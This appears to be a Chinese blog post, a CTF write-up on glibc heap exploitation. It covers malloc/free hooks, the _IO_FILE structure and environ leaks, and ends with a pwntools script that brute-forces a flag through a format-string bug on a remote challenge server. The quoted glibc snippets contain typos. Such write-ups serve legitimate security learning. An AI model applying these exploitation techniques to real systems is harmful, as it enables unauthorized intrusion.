堆漏洞中的getshell - 超级玉米人的博客

超级玉米人

公告

欢迎来到我的博客！这里将分享我的日常与技术学习笔记。~(∠・ω< )⌒★

Learn More

标签

超级玉米人

公告

欢迎来到我的博客！这里将分享我的日常与技术学习笔记。~(∠・ω< )⌒★

Learn More

标签

超级玉米人

公告

欢迎来到我的博客！这里将分享我的日常与技术学习笔记。~(∠・ω< )⌒★

Learn More

标签

317 字

1 分钟

堆漏洞中的getshell

2026-04-11

ctf

ctfwp

/

heap

free_hook/malloc_hook

下面是源代码示例glibc-2.27, glibc>=2.34 被移除)

1
void*
2
__libc_malloc (size_t bytes)
3
{
4
  mstate ar_ptr;
5
  void* victim;
6

7
  void *(*hook) (size_t, const void*)
8
    = atomic_forced_read (__malloc_hook)
9

10
  if (__buildtin_expect (hook != NULL, 0))
11
      return (*hook)(bytes, RETURN_ADDRESS (0));
12

13
#if USE_TCACHE
14
  ...
15
}
16
// RIP

通过这段源码可以很容易发现，byets 是用户传入参数，这里将钩子的值赋值给hook ,然后去调用这个hook，传入参数是bytes, free 方法同理但是 free 接受的是一个指针

IO_FILE结构体

下面是源代码示例 glibc-2.35

1
struct _IO_FILE
2
{
3
  int  _flag; // important
4

5
  char *_IO_read_ptr;
6
  char *_IO_read_end;
7
  char *_IO_read_base;
8
  char *_IO_write_ptr;
9
  char *_IO_write_end;
10
  ...
11

12
  struct _IO_marker *_markers;
13
  struct _IO_FILE *_chain; // important!
14
  ...
15

16
}
17
...
18

19
struct _IO_FILE_complete
20
{
21
  struct _IO_FILE _file;
22

23
  struct _IO_codecvt *_codecvt;    // important
24
  struct _IO_wide_data *_wide_data; // important
25
  struct _IO_FILE *_freeres_list;
26

27
  void *_freeres_buf;
28
  size_t __pad5;
29
  int _mode; // important
30

31
  ...
32
}

IO_FILE 这个结构体会在 puts 等函数运行时被调用, 但是在read/write 为系统调用。

地址任意写. 栈地址的主要泄露方式: environ 泄露

1
#include <unsid.h>
2
#include <stddef.h>
3

4
char **__environ = NULL;
5
weak_alias (__environ, environ)
6

7
weak_alias (__environ, _environ)
8
...

观察 glibc 可以发现这是一个全局变量, environ 是环境变量的初始地址，环境变量在程序加载的时候就已经加载入了栈底，有时候可能flag也会连同加载进入环境变量

比如这道题题目 Mission Final Dance 将题目拖入ida 发现如下重要函数

1
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
2
{
3
  setbuf(stdin, 0);
4
  setbuf(stdout, 0);
5
  setbuf(stderr, 0);
6
  puts("In a dream like a silkworm cocoon...");
7
  puts("Dance! dance your last dance!");
8
  read(0, buf, 0x100u);
9
  printf(buf);
10
  close(1);
11
  exit(0);
12
}

可以发现这里存在一个fmt 题目中存在一个fmt，同时flag在环境变量中存在，所以可以直接爆破出flag

NOTE
于是得到如下 exp

1
from pwn import *
2

3
file = "./pwn_patched"
4
host = "nc1.ctfplus.cn"
5
port = 15247
6

7
isRemote = True
8

9
context.log_level = "info"
10
context.binary = file
11

12
if isRemote:
13
  p = remote(host, port)
14
else:
15
  p = process(file)
16

17
elf = ELF(file)
18
rop = ROP(elf)
19

20
for i in range(20, 120):
21
  try:
22
    # p = process(file)
23
    p = remote(host, port)
24
    p.recvuntil(b"Dance! dance your last dance!\n")
25
    p.sendline(f"%{i}$s".encode())
26

27
    log.info(f"%{i}$s: {p.recvline()}")
28
    p.close()
29
    sleep(.1)
30
  except EOFError:
31
    continue
32
  # p.recvline()
33
# flag %49$p
34

35
p.interactive()